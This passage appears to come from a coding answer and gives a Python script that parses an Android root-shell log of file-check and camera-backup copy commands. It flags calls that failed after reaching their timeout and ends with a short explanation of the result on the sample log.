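SAMPLE_LOG = """\
16.28.14/Shell runSync test -d '/storage/extSdCard/DCIM/CamTest/20140905_182414.mp4' root: true timeout: 3000
16.28.14/Shell start process-thread ID 534
16.28.15/Shell joined with 534
16.28.15/Shell exit result: 1
16.28.15/Shell runSync cp '/storage/extSdCard/DCIM/CamTest/20140905_182414.mp4' '/storage/extSdCard/Camera-Backup' root: true timeout: 7000
16.28.15/Shell start process-thread ID 542
16.28.22/Shell joined with 542
16.28.22/Shell exit result: 9
"""

LINE = re.compile(r"^(\d\d)\.(\d\d)\.(\d\d)/Shell (.*)$")
RUN = re.compile(r"^runSync (.*) root: (true|false) timeout: (\d+)$")

def parse_runs(log_text):
    """Return one dict per runSync call: cmd, root, timeout_ms, elapsed_s, exit."""
    runs, cur = [], None
    for raw in log_text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue  # "Variables" lines and anything else are ignored
        secs = int(m[1]) * 3600 + int(m[2]) * 60 + int(m[3])
        msg = m[4]
        r = RUN.match(msg)
        if r:
            cur = {"cmd": r[1], "root": r[2] == "true", "timeout_ms": int(r[3]),
                   "start": None, "elapsed_s": None, "exit": None}
            runs.append(cur)
        elif cur is None:
            continue
        elif msg.startswith("start process-thread ID"):
            cur["start"] = secs
        elif msg.startswith("joined with") and cur["start"] is not None:
            cur["elapsed_s"] = (secs - cur["start"]) % 86400  # tolerate midnight
        elif msg.startswith("exit result:"):
            cur["exit"] = int(msg.split(":")[1])
    return runs

def timed_out(runs):
    """Calls that failed after running at least as long as their timeout.
    Timestamps have one-second resolution, so this is an approximation."""
    return [r for r in runs if r["exit"] not in (0, None)
            and r["elapsed_s"] is not None
            and r["elapsed_s"] * 1000 >= r["timeout_ms"]]

if __name__ == "__main__":
    for r in timed_out(parse_runs(SAMPLE_LOG)):
        print(f"{r['elapsed_s']}s >= {r['timeout_ms']}ms, exit {r['exit']}: {r['cmd']}")
```

On the sample it reports only the cp call (about 7 s against a 7000 ms timeout, exit result 9); the test -d call also returns non-zero but finishes well inside its 3000 ms timeout.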